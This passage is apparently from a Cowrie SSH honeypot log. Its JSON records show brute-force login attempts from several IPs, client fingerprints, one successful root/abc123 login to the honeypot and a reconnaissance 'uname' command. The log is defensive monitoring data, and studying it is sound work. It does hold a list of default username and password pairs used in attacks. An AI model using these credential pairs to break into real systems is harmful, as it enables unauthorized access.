{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:26.383579Z","src_ip":"83.168.105.65","session":"40d3c7ed3ec0"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:26.496435Z","src_ip":"83.168.105.65","session":"40d3c7ed3ec0"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:27.347943Z","src_ip":"212.227.125.160","session":"32ff605544d7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:27.543987Z","src_ip":"83.168.105.65","session":"40d3c7ed3ec0"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:28.542854Z","src_ip":"212.227.125.160","session":"32ff605544d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38810,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca04d034943b","protocol":"ssh","message":"New connection: 212.227.125.160:38810 (1.2.3.4:22) [session: ca04d034943b]","sensor":"my-vps","timestamp":"2025-08-26T11:27:32.115518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:32.133492Z","src_ip":"212.227.125.160","session":"ca04d034943b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:32.171608Z","src_ip":"212.227.125.160","session":"ca04d034943b"}
{"eventid":"cowrie.login.failed","username":"sem3","password":"sem3","message":"login attempt [sem3/sem3] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:32.401486Z","src_ip":"212.227.125.160","session":"ca04d034943b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:33.454585Z","src_ip":"212.227.125.160","session":"ca04d034943b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39580,"dst_ip":"1.2.3.4","dst_port":22,"session":"06dedbb8c7d6","protocol":"ssh","message":"New connection: 212.227.125.160:39580 (1.2.3.4:22) [session: 06dedbb8c7d6]","sensor":"my-vps","timestamp":"2025-08-26T11:27:37.507638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:37.526896Z","src_ip":"212.227.125.160","session":"06dedbb8c7d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:38.196870Z","src_ip":"212.227.125.160","session":"06dedbb8c7d6"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:38.667908Z","src_ip":"212.227.125.160","session":"06dedbb8c7d6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:39.724516Z","src_ip":"212.227.125.160","session":"06dedbb8c7d6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34526,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d8243f11ef2","protocol":"ssh","message":"New connection: 196.251.86.249:34526 (1.2.3.4:22) [session: 7d8243f11ef2]","sensor":"my-vps","timestamp":"2025-08-26T11:27:40.796598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:41.474560Z","src_ip":"196.251.86.249","session":"7d8243f11ef2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:27:41.475560Z","src_ip":"196.251.86.249","session":"7d8243f11ef2"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":40890,"dst_ip":"1.2.3.4","dst_port":22,"session":"239d0138f14b","protocol":"ssh","message":"New connection: 83.168.105.65:40890 (1.2.3.4:22) [session: 239d0138f14b]","sensor":"my-vps","timestamp":"2025-08-26T11:27:41.767729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:41.769394Z","src_ip":"83.168.105.65","session":"239d0138f14b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:41.808385Z","src_ip":"83.168.105.65","session":"239d0138f14b"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:27:41.927958Z","src_ip":"83.168.105.65","session":"239d0138f14b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:27:42.070577Z","src_ip":"83.168.105.65","session":"239d0138f14b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:27:42.071313Z","src_ip":"83.168.105.65","session":"239d0138f14b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:42.111642Z","src_ip":"83.168.105.65","session":"239d0138f14b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:42.112676Z","src_ip":"83.168.105.65","session":"239d0138f14b"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"pass123","message":"login attempt [hadoop/pass123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:43.463049Z","src_ip":"196.251.86.249","session":"7d8243f11ef2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40350,"dst_ip":"1.2.3.4","dst_port":22,"session":"b91707d64797","protocol":"ssh","message":"New connection: 212.227.125.160:40350 (1.2.3.4:22) [session: b91707d64797]","sensor":"my-vps","timestamp":"2025-08-26T11:27:43.586221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:43.598874Z","src_ip":"212.227.125.160","session":"b91707d64797"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:43.670318Z","src_ip":"212.227.125.160","session":"b91707d64797"}
{"eventid":"cowrie.login.failed","username":"vscode","password":"vscode","message":"login attempt [vscode/vscode] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:43.953759Z","src_ip":"212.227.125.160","session":"b91707d64797"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:44.892339Z","src_ip":"196.251.86.249","session":"7d8243f11ef2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:45.070518Z","src_ip":"212.227.125.160","session":"b91707d64797"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41120,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf72a14cc637","protocol":"ssh","message":"New connection: 212.227.125.160:41120 (1.2.3.4:22) [session: bf72a14cc637]","sensor":"my-vps","timestamp":"2025-08-26T11:27:49.435342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:49.436902Z","src_ip":"212.227.125.160","session":"bf72a14cc637"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:49.503006Z","src_ip":"212.227.125.160","session":"bf72a14cc637"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:49.671267Z","src_ip":"212.227.125.160","session":"bf72a14cc637"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:50.735082Z","src_ip":"212.227.125.160","session":"bf72a14cc637"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41888,"dst_ip":"1.2.3.4","dst_port":22,"session":"d072a6454f90","protocol":"ssh","message":"New connection: 212.227.125.160:41888 (1.2.3.4:22) [session: d072a6454f90]","sensor":"my-vps","timestamp":"2025-08-26T11:27:56.159811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:56.160538Z","src_ip":"212.227.125.160","session":"d072a6454f90"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:56.225925Z","src_ip":"212.227.125.160","session":"d072a6454f90"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:56.895632Z","src_ip":"212.227.125.160","session":"d072a6454f90"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41526,"dst_ip":"1.2.3.4","dst_port":22,"session":"309cd8d59cc9","protocol":"ssh","message":"New connection: 83.168.105.65:41526 (1.2.3.4:22) [session: 309cd8d59cc9]","sensor":"my-vps","timestamp":"2025-08-26T11:27:57.305053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:57.306279Z","src_ip":"83.168.105.65","session":"309cd8d59cc9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:57.346794Z","src_ip":"83.168.105.65","session":"309cd8d59cc9"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:57.470268Z","src_ip":"83.168.105.65","session":"309cd8d59cc9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:57.958852Z","src_ip":"212.227.125.160","session":"d072a6454f90"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:58.512825Z","src_ip":"83.168.105.65","session":"309cd8d59cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42658,"dst_ip":"1.2.3.4","dst_port":22,"session":"39f68b816c15","protocol":"ssh","message":"New connection: 212.227.125.160:42658 (1.2.3.4:22) [session: 39f68b816c15]","sensor":"my-vps","timestamp":"2025-08-26T11:28:01.886066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:01.887032Z","src_ip":"212.227.125.160","session":"39f68b816c15"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","a